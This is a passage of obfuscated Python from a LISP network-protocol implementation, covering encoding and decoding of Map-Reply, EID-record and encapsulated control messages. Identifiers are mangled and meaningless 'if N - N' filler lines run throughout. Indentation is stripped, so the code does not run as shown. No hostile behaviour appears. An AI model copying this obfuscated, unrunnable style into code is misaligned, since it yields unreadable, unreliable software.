lprint ( "{} for RLOC {}" . format ( o0OOo , red ( oo0o00OO ,
False ) ) )
o0Oo . copy_keypair ( Ii11i )
o0Oo . uptime = Ii11i . uptime
Ii11i = None
if 39 - 39: iII111i - OoO0O00
if 1 - 1: OoooooooOO - ooOoO0o
if 24 - 24: II111iiii % iII111i % Ii1I % iII111i % I11i . iIii1I11I1II1
if ( Ii11i == None ) :
self . keys = [ None , o0Oo , None , None ]
if ( lisp_i_am_etr == False and lisp_i_am_rtr == False ) :
o0Oo . local_public_key = None
lprint ( "{} for {}" . format ( bold ( "Ignoring decap-keys" ,
False ) , red ( oo0o00OO , False ) ) )
elif ( o0Oo . remote_public_key != None ) :
if ( Ooo00O0ooOo ) :
lprint ( "{} for RLOC {}" . format ( bold ( "New decap-keying" , False ) ,
# i11iIiiIii * ooOoO0o - II111iiii
red ( oo0o00OO , False ) ) )
if 23 - 23: IiII
o0Oo . compute_shared_key ( "decap" )
o0Oo . add_key_by_rloc ( oo0o00OO , False )
if 53 - 53: I1Ii111 % OOooOOo . Ii1I / OOooOOo * OOooOOo * O0
if 1 - 1: iIii1I11I1II1 % I1ii11iIi11i . oO0o . IiII . o0oOOo0O0Ooo / o0oOOo0O0Ooo
if 52 - 52: O0 * OoooooooOO . I1Ii111 . OOooOOo - iII111i % iII111i
if 33 - 33: i11iIiiIii - o0oOOo0O0Ooo . I1IiiI - oO0o - II111iiii + O0
self . itr_rlocs . append ( OooO0OO0 )
oOO0ooOoOoOo -= 1
if 54 - 54: iIii1I11I1II1 - IiII - IiII
if 18 - 18: i11iIiiIii + iIii1I11I1II1 . i11iIiiIii
IiIii1i = struct . calcsize ( "BBH" )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 63 - 63: iII111i - OoO0O00 * OOooOOo
Iiii1I , oO00OO0Ooo00O , IiiiII = struct . unpack ( "BBH" , packet [ : IiIii1i ] )
self . subscribe_bit = ( Iiii1I & 0x80 )
self . target_eid . afi = socket . ntohs ( IiiiII )
packet = packet [ IiIii1i : : ]
if 89 - 89: iII111i / Oo0Ooo
self . target_eid . mask_len = oO00OO0Ooo00O
if ( self . target_eid . afi == LISP_AFI_LCAF ) :
packet , OO0Ooo = self . target_eid . lcaf_decode_eid ( packet )
if ( packet == None ) : return ( None )
if ( OO0Ooo ) : self . target_group = OO0Ooo
else :
packet = self . target_eid . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = packet [ IiIii1i : : ]
if 74 - 74: OOooOOo - II111iiii
return ( packet )
if 66 - 66: i11iIiiIii + I1Ii111 . ooOoO0o
if 46 - 46: I1Ii111 / I1ii11iIi11i
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . target_eid , self . target_group ) )
if 41 - 41: i1IIi % Ii1I + I1Ii111 . Oo0Ooo / iIii1I11I1II1
if 77 - 77: Oo0Ooo . OoO0O00 % O0 - OoO0O00 - Oo0Ooo
def encode_xtr_id ( self , packet ) :
OOO0oo = self . xtr_id >> 64
ii1iII1 = self . xtr_id & 0xffffffffffffffff
OOO0oo = byte_swap_64 ( OOO0oo )
ii1iII1 = byte_swap_64 ( ii1iII1 )
packet += struct . pack ( "QQ" , OOO0oo , ii1iII1 )
return ( packet )
if 95 - 95: IiII * II111iiii % o0oOOo0O0Ooo * Oo0Ooo . I11i
if 46 - 46: II111iiii - OoO0O00 % ooOoO0o
def decode_xtr_id ( self , packet ) :
IiIii1i = struct . calcsize ( "QQ" )
if ( len ( packet ) < IiIii1i ) : return ( None )
packet = packet [ len ( packet ) - IiIii1i : : ]
OOO0oo , ii1iII1 = struct . unpack ( "QQ" , packet [ : IiIii1i ] )
OOO0oo = byte_swap_64 ( OOO0oo )
ii1iII1 = byte_swap_64 ( ii1iII1 )
self . xtr_id = ( OOO0oo << 64 ) | ii1iII1
return ( True )
if 97 - 97: OoO0O00 . OoOoOO00
if 78 - 78: I1ii11iIi11i + I1ii11iIi11i . OoOoOO00 - IiII * iIii1I11I1II1 * O0
if 26 - 26: OoooooooOO + oO0o + OoO0O00 . O0
if 46 - 46: OoooooooOO - Oo0Ooo * I1Ii111 * OOooOOo * I1Ii111 . oO0o
if 96 - 96: Ii1I / IiII % o0oOOo0O0Ooo + I11i
if 46 - 46: OoO0O00 * I1IiiI
if 25 - 25: I1Ii111 . IiII % O0 % i1IIi
if 53 - 53: O0 % ooOoO0o
if 41 - 41: IiII
if 29 - 29: ooOoO0o
if 70 - 70: oO0o . O0 % I11i % IiII - I11i * I1ii11iIi11i
if 22 - 22: i1IIi
if 82 - 82: oO0o . iIii1I11I1II1 - I1ii11iIi11i
if 55 - 55: Oo0Ooo % Ii1I . iIii1I11I1II1 * I1Ii111
if 33 - 33: O0 - I1IiiI / I1ii11iIi11i / OoO0O00 + iII111i - oO0o
if 27 - 27: I1Ii111 + ooOoO0o - I1Ii111 % i11iIiiIii * Oo0Ooo * o0oOOo0O0Ooo
if 88 - 88: OOooOOo
if 25 - 25: OoO0O00 + o0oOOo0O0Ooo . ooOoO0o - Ii1I . oO0o * Ii1I
if 85 - 85: i1IIi
if 94 - 94: OoooooooOO . O0 / OoooooooOO
if 67 - 67: i11iIiiIii + OoOoOO00
if 50 - 50: ooOoO0o . i1IIi + I1ii11iIi11i . OOooOOo
if 97 - 97: I1IiiI
if 63 - 63: O0 - OoOoOO00 / i11iIiiIii / OoooooooOO / ooOoO0o / II111iiii
if 45 - 45: II111iiii . OoO0O00 + OoO0O00 * iIii1I11I1II1
if 23 - 23: IiII * OoOoOO00 % Ii1I / Ii1I - ooOoO0o - OOooOOo
if 86 - 86: OOooOOo . OoooooooOO * I1IiiI - Oo0Ooo / i11iIiiIii * iII111i
if 56 - 56: I1IiiI . I11i % iII111i
if 33 - 33: I11i / OOooOOo - OOooOOo / i11iIiiIii * OoOoOO00 + O0
if 2 - 2: i11iIiiIii % I1IiiI
if 90 - 90: II111iiii
if 2 - 2: Ii1I - OoooooooOO - i11iIiiIii % Oo0Ooo / Ii1I
class lisp_map_reply ( ) :
def __init__ ( self ) :
self . rloc_probe = False
self . echo_nonce_capable = False
self . security = False
self . record_count = 0
self . hop_count = 0
self . nonce = 0
self . keys = None
if 77 - 77: o0oOOo0O0Ooo . o0oOOo0O0Ooo * I1Ii111 + OOooOOo - i11iIiiIii
if 45 - 45: I1IiiI . I1IiiI - Oo0Ooo * OOooOOo
def print_map_reply ( self ) :
oOOo0ooO0 = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + "nonce: 0x{}"
if 71 - 71: i1IIi / I11i
lprint ( oOOo0ooO0 . format ( bold ( "Map-Reply" , False ) , "R" if self . rloc_probe else "r" ,
# O0
"E" if self . echo_nonce_capable else "e" ,
"S" if self . security else "s" , self . hop_count , self . record_count ,
lisp_hex_string ( self . nonce ) ) )
if 19 - 19: IiII / o0oOOo0O0Ooo - Ii1I . i11iIiiIii + oO0o % OoOoOO00
if 97 - 97: OOooOOo . OOooOOo . iII111i . iII111i
def encode ( self ) :
i1OOoO0OO0oO = ( LISP_MAP_REPLY << 28 ) | self . record_count
i1OOoO0OO0oO |= self . hop_count << 8
if ( self . rloc_probe ) : i1OOoO0OO0oO |= 0x08000000
if ( self . echo_nonce_capable ) : i1OOoO0OO0oO |= 0x04000000
if ( self . security ) : i1OOoO0OO0oO |= 0x02000000
if 63 - 63: O0 * IiII / Oo0Ooo . I1IiiI . I1IiiI / i11iIiiIii
IiiiIi1iiii11 = struct . pack ( "I" , socket . htonl ( i1OOoO0OO0oO ) )
IiiiIi1iiii11 += struct . pack ( "Q" , self . nonce )
return ( IiiiIi1iiii11 )
if 17 - 17: iIii1I11I1II1 / OoO0O00 - II111iiii
if 46 - 46: iIii1I11I1II1 * oO0o / i11iIiiIii + II111iiii + I11i
def decode ( self , packet ) :
O0O00Oo = "I"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 30 - 30: O0 * IiII - I1Ii111 % O0 * Ii1I
i1OOoO0OO0oO = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
i1OOoO0OO0oO = i1OOoO0OO0oO [ 0 ]
packet = packet [ IiIii1i : : ]
if 29 - 29: I1ii11iIi11i % I1ii11iIi11i % Ii1I + ooOoO0o % iIii1I11I1II1
O0O00Oo = "Q"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 41 - 41: I1ii11iIi11i % I1Ii111
o0OOO = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
packet = packet [ IiIii1i : : ]
if 37 - 37: Oo0Ooo . I1IiiI % OoOoOO00 . OoO0O00 - Oo0Ooo / OoO0O00
i1OOoO0OO0oO = socket . ntohl ( i1OOoO0OO0oO )
self . rloc_probe = True if ( i1OOoO0OO0oO & 0x08000000 ) else False
self . echo_nonce_capable = True if ( i1OOoO0OO0oO & 0x04000000 ) else False
self . security = True if ( i1OOoO0OO0oO & 0x02000000 ) else False
self . hop_count = ( i1OOoO0OO0oO >> 8 ) & 0xff
self . record_count = i1OOoO0OO0oO & 0xff
self . nonce = o0OOO [ 0 ]
if 34 - 34: i11iIiiIii + OoO0O00 + i11iIiiIii . IiII % O0
if ( lisp_crypto_keys_by_nonce . has_key ( self . nonce ) ) :
self . keys = lisp_crypto_keys_by_nonce [ self . nonce ]
self . keys [ 1 ] . delete_key_by_nonce ( self . nonce )
if 64 - 64: o0oOOo0O0Ooo . iIii1I11I1II1
return ( packet )
if 86 - 86: ooOoO0o - I11i . iIii1I11I1II1 - iIii1I11I1II1
if 61 - 61: Ii1I % Oo0Ooo + OoOoOO00
if 60 - 60: oO0o . OoooooooOO
if 40 - 40: I11i
if 44 - 44: ooOoO0o
if 35 - 35: II111iiii + iII111i / I1ii11iIi11i * I1IiiI . I11i
if 97 - 97: I1IiiI / o0oOOo0O0Ooo
if 13 - 13: I1ii11iIi11i
if 72 - 72: Oo0Ooo + IiII / Ii1I * Oo0Ooo
if 41 - 41: OOooOOo - OoOoOO00 . I1IiiI + i11iIiiIii + OoO0O00 * iII111i
if 85 - 85: OoO0O00 + II111iiii
if 87 - 87: OoO0O00
if 93 - 93: OoooooooOO
if 80 - 80: o0oOOo0O0Ooo
if 3 - 3: i11iIiiIii / OOooOOo + oO0o
if 10 - 10: OoO0O00 . OoO0O00 + O0
if 13 - 13: i1IIi . I1IiiI
if 45 - 45: ooOoO0o % I11i
if 37 - 37: iII111i
if 70 - 70: O0 + iIii1I11I1II1 % O0 * o0oOOo0O0Ooo - Oo0Ooo - ooOoO0o
if 94 - 94: i1IIi + IiII / OoooooooOO - oO0o / OOooOOo / OoOoOO00
if 55 - 55: OOooOOo
if 5 - 5: I11i / OoOoOO00
if 48 - 48: i1IIi - oO0o . OoooooooOO - OoO0O00 - i1IIi
if 19 - 19: oO0o % Ii1I + I1ii11iIi11i . II111iiii * i11iIiiIii
if 87 - 87: Ii1I / I1Ii111 % OoOoOO00 * I1ii11iIi11i - OoooooooOO / OoOoOO00
if 24 - 24: I11i . OOooOOo * i1IIi . I1ii11iIi11i / ooOoO0o / O0
if 62 - 62: o0oOOo0O0Ooo % II111iiii
if 22 - 22: oO0o - o0oOOo0O0Ooo
if 89 - 89: OOooOOo
if 34 - 34: iII111i . OOooOOo
if 13 - 13: OoO0O00 * OOooOOo + oO0o
class lisp_eid_record ( ) :
def __init__ ( self ) :
self . record_ttl = 0
self . rloc_count = 0
self . action = 0
self . authoritative = False
self . ddt_incomplete = False
self . signature_count = 0
self . map_version = 0
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . record_ttl = 0
if 21 - 21: i11iIiiIii . Ii1I % i1IIi * Ii1I . oO0o + Ii1I
if 92 - 92: i1IIi + OoO0O00 * I11i
def print_prefix ( self ) :
if ( self . group . is_null ( ) ) :
return ( green ( self . eid . print_prefix ( ) , False ) )
if 70 - 70: Oo0Ooo
return ( green ( self . eid . print_sg ( self . group ) , False ) )
if 93 - 93: iII111i . I1ii11iIi11i . Oo0Ooo . oO0o . OoooooooOO
if 51 - 51: O0 - iII111i
def print_ttl ( self ) :
Oo0o0 = self . record_ttl
if ( self . record_ttl & 0x80000000 ) :
Oo0o0 = str ( self . record_ttl & 0x7fffffff ) + " secs"
elif ( ( Oo0o0 % 60 ) == 0 ) :
Oo0o0 = str ( Oo0o0 / 60 ) + " hours"
else :
Oo0o0 = str ( Oo0o0 ) + " mins"
if 87 - 87: o0oOOo0O0Ooo % OoO0O00 + Oo0Ooo
return ( Oo0o0 )
if 93 - 93: OoooooooOO + i1IIi * iII111i + Oo0Ooo - iII111i * OoO0O00
if 96 - 96: O0 + I1ii11iIi11i
def store_ttl ( self ) :
Oo0o0 = self . record_ttl * 60
if ( self . record_ttl & 0x80000000 ) : Oo0o0 = self . record_ttl & 0x7fffffff
return ( Oo0o0 )
if 27 - 27: i1IIi - i1IIi - Ii1I - OOooOOo
if 75 - 75: iII111i % O0 - I11i - I1ii11iIi11i + I1IiiI - I1IiiI
def print_record ( self , indent , ddt ) :
Oo00OoooO0o = ""
I1III1ii1 = ""
iiI111iiII = bold ( "invalid-action" , False )
if ( ddt ) :
if ( self . action < len ( lisp_map_referral_action_string ) ) :
iiI111iiII = lisp_map_referral_action_string [ self . action ]
iiI111iiII = bold ( iiI111iiII , False )
Oo00OoooO0o = ( ", " + bold ( "ddt-incomplete" , False ) ) if self . ddt_incomplete else ""
if 92 - 92: iII111i / OoooooooOO * OoOoOO00 + OoOoOO00 - Ii1I * o0oOOo0O0Ooo
I1III1ii1 = ( ", sig-count: " + str ( self . signature_count ) ) if ( self . signature_count != 0 ) else ""
if 91 - 91: OoOoOO00
if 65 - 65: OOooOOo . II111iiii * i11iIiiIii + OOooOOo
else :
if ( self . action < len ( lisp_map_reply_action_string ) ) :
iiI111iiII = lisp_map_reply_action_string [ self . action ]
if ( self . action != LISP_NO_ACTION ) :
iiI111iiII = bold ( iiI111iiII , False )
if 99 - 99: I1ii11iIi11i % Oo0Ooo
if 31 - 31: o0oOOo0O0Ooo - II111iiii * OOooOOo . OOooOOo - oO0o
if 57 - 57: OOooOOo / i11iIiiIii / I1Ii111 - Oo0Ooo . iIii1I11I1II1
if 84 - 84: IiII
IiiiII = LISP_AFI_LCAF if ( self . eid . afi < 0 ) else self . eid . afi
oOOo0ooO0 = ( "{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}" )
if 42 - 42: O0 . I1Ii111 / I11i
lprint ( oOOo0ooO0 . format ( indent , self . print_ttl ( ) , self . rloc_count ,
iiI111iiII , "auth" if ( self . authoritative is True ) else "non-auth" ,
Oo00OoooO0o , I1III1ii1 , self . map_version , IiiiII ,
green ( self . print_prefix ( ) , False ) ) )
if 69 - 69: OoOoOO00 / I1Ii111 * I1IiiI
if 76 - 76: O0 + II111iiii * OoO0O00
def encode ( self ) :
iI1IIi1I = self . action << 13
if ( self . authoritative ) : iI1IIi1I |= 0x1000
if ( self . ddt_incomplete ) : iI1IIi1I |= 0x800
if 42 - 42: OoooooooOO / IiII * II111iiii
if 77 - 77: II111iiii + iII111i . o0oOOo0O0Ooo / I1Ii111
if 100 - 100: Ii1I
if 84 - 84: I11i * ooOoO0o + i11iIiiIii + iII111i - II111iiii
IiiiII = self . eid . afi if ( self . eid . instance_id == 0 ) else LISP_AFI_LCAF
if ( IiiiII < 0 ) : IiiiII = LISP_AFI_LCAF
Oo0ooO = ( self . group . is_null ( ) == False )
if ( Oo0ooO ) : IiiiII = LISP_AFI_LCAF
if 54 - 54: oO0o
O0o0 = ( self . signature_count << 12 ) | self . map_version
oO00OO0Ooo00O = 0 if self . eid . is_binary ( ) == False else self . eid . mask_len
if 64 - 64: OoOoOO00 + iII111i * OoOoOO00 - I1IiiI * OoooooooOO
IiiiIi1iiii11 = struct . pack ( "IBBHHH" , socket . htonl ( self . record_ttl ) ,
self . rloc_count , oO00OO0Ooo00O , socket . htons ( iI1IIi1I ) ,
socket . htons ( O0o0 ) , socket . htons ( IiiiII ) )
if 27 - 27: II111iiii + i11iIiiIii
if 32 - 32: i1IIi
if 76 - 76: II111iiii % ooOoO0o - I1ii11iIi11i
if 50 - 50: II111iiii / I1IiiI . Ii1I % i11iIiiIii
if ( Oo0ooO ) :
IiiiIi1iiii11 += self . eid . lcaf_encode_sg ( self . group )
return ( IiiiIi1iiii11 )
if 66 - 66: oO0o / OOooOOo / iII111i
if 5 - 5: I1Ii111 . oO0o
if 77 - 77: iII111i / i11iIiiIii
if 20 - 20: O0 . I11i
if 67 - 67: OoOoOO00 - ooOoO0o - iIii1I11I1II1
if ( self . eid . afi == LISP_AFI_GEO_COORD and self . eid . instance_id == 0 ) :
IiiiIi1iiii11 = IiiiIi1iiii11 [ 0 : - 2 ]
IiiiIi1iiii11 += self . eid . address . encode_geo ( )
return ( IiiiIi1iiii11 )
if 31 - 31: II111iiii + o0oOOo0O0Ooo * i11iIiiIii . o0oOOo0O0Ooo
if 73 - 73: oO0o / OOooOOo * II111iiii % OoooooooOO - i1IIi - ooOoO0o
if 43 - 43: o0oOOo0O0Ooo + Ii1I % OoO0O00 . I1Ii111 + i1IIi
if 85 - 85: Oo0Ooo % I1ii11iIi11i / OOooOOo
if 65 - 65: ooOoO0o + IiII - OoOoOO00 % II111iiii - iIii1I11I1II1
if ( IiiiII == LISP_AFI_LCAF ) :
IiiiIi1iiii11 += self . eid . lcaf_encode_iid ( )
return ( IiiiIi1iiii11 )
if 39 - 39: I1IiiI + I1ii11iIi11i - i11iIiiIii
if 43 - 43: iIii1I11I1II1
if 73 - 73: OoOoOO00 + o0oOOo0O0Ooo
if 58 - 58: i1IIi * I1ii11iIi11i % iII111i . OoO0O00 % IiII % I11i
if 63 - 63: I1ii11iIi11i % ooOoO0o % I1ii11iIi11i
IiiiIi1iiii11 += self . eid . pack_address ( )
return ( IiiiIi1iiii11 )
if 71 - 71: Ii1I
if 43 - 43: o0oOOo0O0Ooo / ooOoO0o
def decode ( self , packet ) :
O0O00Oo = "IBBHHH"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 88 - 88: i11iIiiIii - i1IIi + Oo0Ooo - O0
self . record_ttl , self . rloc_count , self . eid . mask_len , iI1IIi1I , self . map_version , self . eid . afi = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
if 50 - 50: I1ii11iIi11i
if 37 - 37: oO0o % iII111i / II111iiii / OoO0O00 - IiII - ooOoO0o
if 69 - 69: I1ii11iIi11i . OoooooooOO % I1Ii111
self . record_ttl = socket . ntohl ( self . record_ttl )
iI1IIi1I = socket . ntohs ( iI1IIi1I )
self . action = ( iI1IIi1I >> 13 ) & 0x7
self . authoritative = True if ( ( iI1IIi1I >> 12 ) & 1 ) else False
self . ddt_incomplete = True if ( ( iI1IIi1I >> 11 ) & 1 ) else False
self . map_version = socket . ntohs ( self . map_version )
self . signature_count = self . map_version >> 12
self . map_version = self . map_version & 0xfff
self . eid . afi = socket . ntohs ( self . eid . afi )
self . eid . instance_id = 0
packet = packet [ IiIii1i : : ]
if 79 - 79: I1IiiI - IiII . OoooooooOO - I1ii11iIi11i
if 79 - 79: OOooOOo + o0oOOo0O0Ooo % iII111i . oO0o
if 49 - 49: Ii1I + i11iIiiIii * OoOoOO00 . OoOoOO00 . I1ii11iIi11i . Oo0Ooo
if 61 - 61: I11i / OOooOOo
if ( self . eid . afi == LISP_AFI_LCAF ) :
packet , OOo0oOOO0 = self . eid . lcaf_decode_eid ( packet )
if ( OOo0oOOO0 ) : self . group = OOo0oOOO0
self . group . instance_id = self . eid . instance_id
return ( packet )
if 79 - 79: OoooooooOO * OoO0O00 + OoO0O00 % Ii1I % OOooOOo * IiII
if 11 - 11: OOooOOo - Ii1I
packet = self . eid . unpack_address ( packet )
return ( packet )
if 44 - 44: oO0o + oO0o - I11i % I11i - i11iIiiIii / Oo0Ooo
if 51 - 51: I1IiiI * I1IiiI
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 49 - 49: I1Ii111
if 11 - 11: i1IIi
if 65 - 65: OoO0O00 . ooOoO0o
if 12 - 12: I1Ii111 + O0 - oO0o . IiII
if 46 - 46: IiII . ooOoO0o / iII111i
if 63 - 63: II111iiii - I1ii11iIi11i * II111iiii
if 92 - 92: OoO0O00 % ooOoO0o * O0 % iIii1I11I1II1 / i1IIi / OoOoOO00
if 67 - 67: I1Ii111 + I11i + I1Ii111 . OOooOOo % o0oOOo0O0Ooo / ooOoO0o
if 78 - 78: I1ii11iIi11i . O0
if 56 - 56: oO0o - i1IIi * O0 / I11i * I1IiiI . I11i
if 54 - 54: i11iIiiIii % i1IIi + Oo0Ooo / OoOoOO00
if 26 - 26: I11i . I1ii11iIi11i
if 55 - 55: OoOoOO00 * I1Ii111 % OoO0O00 - OoO0O00
if 34 - 34: O0 * OoO0O00 - oO0o - IiII * Ii1I . II111iiii
if 28 - 28: O0 % iII111i - i1IIi
if 49 - 49: ooOoO0o . I11i - iIii1I11I1II1
if 41 - 41: ooOoO0o * i11iIiiIii % ooOoO0o . oO0o
if 97 - 97: oO0o - iII111i + IiII . OoOoOO00 + iIii1I11I1II1
if 75 - 75: ooOoO0o + ooOoO0o . I1Ii111 % iII111i / iIii1I11I1II1 * iII111i
if 13 - 13: II111iiii * i11iIiiIii - i1IIi * OoO0O00 + i1IIi
if 43 - 43: O0 % oO0o * I1IiiI
if 64 - 64: II111iiii + i11iIiiIii
if 17 - 17: O0 * I1IiiI
if 40 - 40: iIii1I11I1II1 * iII111i % iIii1I11I1II1
if 39 - 39: i1IIi . Ii1I - Oo0Ooo
if 91 - 91: I1IiiI - OoooooooOO - OoooooooOO
if 69 - 69: iII111i * i11iIiiIii / i1IIi
if 86 - 86: I1IiiI % I11i * O0 + i1IIi % I1Ii111
if 97 - 97: II111iiii * OoOoOO00 - I1Ii111 / i11iIiiIii / OoOoOO00
if 25 - 25: Oo0Ooo / Oo0Ooo
if 74 - 74: OOooOOo
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
if 30 - 30: O0 . Ii1I / o0oOOo0O0Ooo + I1IiiI - O0
class lisp_ecm ( ) :
def __init__ ( self , sport ) :
self . security = False
self . ddt = False
self . to_etr = False
self . to_ms = False
self . length = 0
self . ttl = LISP_DEFAULT_ECM_TTL
self . protocol = LISP_UDP_PROTOCOL
self . ip_checksum = 0
self . source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . udp_sport = sport
self . udp_dport = LISP_CTRL_PORT
self . udp_checksum = 0
self . udp_length = 0
self . afi = LISP_AFI_NONE
if 88 - 88: i11iIiiIii
if 33 - 33: OoO0O00 + O0
def print_ecm ( self ) :
oOOo0ooO0 = ( "{} -> flags: {}{}{}{}, " + "inner IP: {} -> {}, inner UDP: {} -> {}" )
if 20 - 20: o0oOOo0O0Ooo % I11i . ooOoO0o - i1IIi . O0
lprint ( oOOo0ooO0 . format ( bold ( "ECM" , False ) , "S" if self . security else "s" ,
"D" if self . ddt else "d" , "E" if self . to_etr else "e" ,
"M" if self . to_ms else "m" ,
green ( self . source . print_address ( ) , False ) ,
green ( self . dest . print_address ( ) , False ) , self . udp_sport ,
self . udp_dport ) )
if 10 - 10: i1IIi
def encode ( self , packet , inner_source , inner_dest ) :
self . udp_length = len ( packet ) + 8
self . source = inner_source
self . dest = inner_dest
if ( inner_dest . is_ipv4 ( ) ) :
self . afi = LISP_AFI_IPV4
self . length = self . udp_length + 20
if 49 - 49: I1Ii111 - Ii1I . O0
if ( inner_dest . is_ipv6 ( ) ) :
self . afi = LISP_AFI_IPV6
self . length = self . udp_length
if 46 - 46: OOooOOo
if 64 - 64: I1IiiI / OoOoOO00
if 6 - 6: i11iIiiIii - iII111i * i1IIi - iII111i
if 8 - 8: I11i / i11iIiiIii . O0 / OoO0O00 * oO0o + I1Ii111
if 91 - 91: I1IiiI
if 84 - 84: O0 % Ii1I
i1OOoO0OO0oO = ( LISP_ECM << 28 )
if ( self . security ) : i1OOoO0OO0oO |= 0x08000000
if ( self . ddt ) : i1OOoO0OO0oO |= 0x04000000
if ( self . to_etr ) : i1OOoO0OO0oO |= 0x02000000
if ( self . to_ms ) : i1OOoO0OO0oO |= 0x01000000
if 3 - 3: I1IiiI . I11i / I1ii11iIi11i
I1i1ii = struct . pack ( "I" , socket . htonl ( i1OOoO0OO0oO ) )
if 14 - 14: ooOoO0o
ooooo0Oo0 = ""
if ( self . afi == LISP_AFI_IPV4 ) :
ooooo0Oo0 = struct . pack ( "BBHHHBBH" , 0x45 , 0 , socket . htons ( self . length ) ,
0 , 0 , self . ttl , self . protocol , socket . htons ( self . ip_checksum ) )
ooooo0Oo0 += self . source . pack_address ( )
ooooo0Oo0 += self . dest . pack_address ( )
ooooo0Oo0 = lisp_ip_checksum ( ooooo0Oo0 )
if 24 - 24: OOooOOo . Oo0Ooo . O0 - oO0o - O0 . Ii1I
if ( self . afi == LISP_AFI_IPV6 ) :
ooooo0Oo0 = struct . pack ( "BBHHBB" , 0x60 , 0 , 0 , socket . htons ( self . length ) ,
self . protocol , self . ttl )
ooooo0Oo0 += self . source . pack_address ( )
ooooo0Oo0 += self . dest . pack_address ( )
if 26 - 26: iIii1I11I1II1 / i1IIi
if 18 - 18: ooOoO0o + Ii1I
OO0o0OO0 = socket . htons ( self . udp_sport )
o0 = socket . htons ( self . udp_dport )
IIi1I1 = socket . htons ( self . udp_length )
IiiI11iIi = socket . htons ( self . udp_checksum )
oOoO0OOO00O = struct . pack ( "HHHH" , OO0o0OO0 , o0 , IIi1I1 , IiiI11iIi )
return ( I1i1ii + ooooo0Oo0 + oOoO0OOO00O )
if 16 - 16: iII111i / II111iiii + I1IiiI . II111iiii - iII111i
if 61 - 61: II111iiii . OoO0O00 - II111iiii
def decode ( self , packet ) :
if 75 - 75: Oo0Ooo - OoOoOO00 + oO0o % i1IIi * OOooOOo
if 56 - 56: OoOoOO00 / OoO0O00 / I1IiiI % OoooooooOO
if 39 - 39: I1IiiI + II111iiii * Oo0Ooo % Ii1I . o0oOOo0O0Ooo * oO0o
if 42 - 42: Ii1I / Oo0Ooo
O0O00Oo = "I"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 25 - 25: OoooooooOO % Ii1I * I1Ii111 * I11i + I1IiiI % I1ii11iIi11i
i1OOoO0OO0oO = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
if 70 - 70: Ii1I + I1ii11iIi11i * I11i * i1IIi . I1Ii111
i1OOoO0OO0oO = socket . ntohl ( i1OOoO0OO0oO [ 0 ] )
self . security = True if ( i1OOoO0OO0oO & 0x08000000 ) else False
self . ddt = True if ( i1OOoO0OO0oO & 0x04000000 ) else False
self . to_etr = True if ( i1OOoO0OO0oO & 0x02000000 ) else False
self . to_ms = True if ( i1OOoO0OO0oO & 0x01000000 ) else False
packet = packet [ IiIii1i : : ]
if 76 - 76: OoooooooOO * OoOoOO00 . OoooooooOO
if 46 - 46: ooOoO0o * o0oOOo0O0Ooo % II111iiii / I1Ii111
if 29 - 29: OoO0O00 - i11iIiiIii % Oo0Ooo % o0oOOo0O0Ooo
if 30 - 30: oO0o - Ii1I % Ii1I
if ( len ( packet ) < 1 ) : return ( None )
Iii11111I1iii = struct . unpack ( "B" , packet [ 0 : 1 ] ) [ 0 ]
Iii11111I1iii = Iii11111I1iii >> 4
if 8 - 8: IiII
if ( Iii11111I1iii == 4 ) :
IiIii1i = struct . calcsize ( "HHIBBH" )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 68 - 68: IiII . OoooooooOO - i11iIiiIii + i11iIiiIii
oOo0oo , IIi1I1 , oOo0oo , oO0Oo0O , IiI1i1i1 , IiiI11iIi = struct . unpack ( "HHIBBH" , packet [ : IiIii1i ] )
self . length = socket . ntohs ( IIi1I1 )
self . ttl = oO0Oo0O
self . protocol = IiI1i1i1
self . ip_checksum = socket . ntohs ( IiiI11iIi )
self . source . afi = self . dest . afi = LISP_AFI_IPV4
if 12 - 12: Oo0Ooo * Ii1I / OoO0O00 % oO0o / I11i * ooOoO0o
if 64 - 64: I1IiiI % I1Ii111 + OoooooooOO
if 11 - 11: I1Ii111
if 87 - 87: i11iIiiIii * I1ii11iIi11i + OOooOOo - ooOoO0o
IiI1i1i1 = struct . pack ( "H" , 0 )
IIiIII1I1i = struct . calcsize ( "HHIBB" )
I1iiI1IiI1iii = struct . calcsize ( "H" )
packet = packet [ : IIiIII1I1i ] + IiI1i1i1 + packet [ IIiIII1I1i + I1iiI1IiI1iii : ]
if 28 - 28: iII111i - i1IIi - OOooOOo
packet = packet [ IiIii1i : : ]
packet = self . source . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = self . dest . unpack_address ( packet )
if ( packet == None ) : return ( None )
if 54 - 54: i11iIiiIii
if 57 - 57: I11i / IiII * i1IIi + II111iiii . o0oOOo0O0Ooo
if ( Iii11111I1iii == 6 ) :
IiIii1i = struct . calcsize ( "IHBB" )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 11 - 11: II111iiii
oOo0oo , IIi1I1 , IiI1i1i1 , oO0Oo0O = struct . unpack ( "IHBB" , packet [ : IiIii1i ] )
self . length = socket . ntohs ( IIi1I1 )
self . protocol = IiI1i1i1
self . ttl = oO0Oo0O
self . source . afi = self . dest . afi = LISP_AFI_IPV6
if 66 - 66: Ii1I - I1IiiI . OoooooooOO * I1Ii111
packet = packet [ IiIii1i : : ]
